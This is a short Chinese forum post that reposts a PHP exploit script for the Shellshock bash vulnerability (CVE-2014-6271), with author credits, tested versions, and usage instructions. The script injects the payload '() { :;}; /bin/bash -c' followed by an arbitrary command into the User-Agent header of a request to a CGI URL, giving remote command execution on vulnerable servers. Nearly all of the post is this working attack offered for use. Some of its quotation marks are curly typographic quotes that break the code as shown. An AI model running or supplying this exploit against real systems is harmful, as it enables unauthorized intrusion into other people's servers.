|
|
发表于 2014-9-25 20:50:55
|
显示全部楼层
<?php
/*
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Test CGI Code : #!/bin/bash
echo “Content-type: text/html”
echo “”
echo “Bash-is-Vulnerable”
*/
error_reporting( 0 );
if (!defined(‘STDIN’)) die( “Please run it through command-line!\n” );
$x = getopt( “u:c:” );
if (!isset($x['u']) || !isset($x['c']))
{
die( “Usage: “ .$_SERVER['PHP_SELF']. ” -u URL -c cmd\n” );
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
array(
‘http’ => array(
‘method’ => ‘GET’,
‘header’ => ‘User-Agent: () { :;}; /bin/bash -c “‘.$cmd.’” ‘
)
)
);
if (!file_get_contents($url, false , $context) && strpos($http_response_header[ 0 ], “500″ ) > 0 )
die( “Command sent to the server!\n” );
else
die( “Connection Error\n” );
?>
|
|
楼主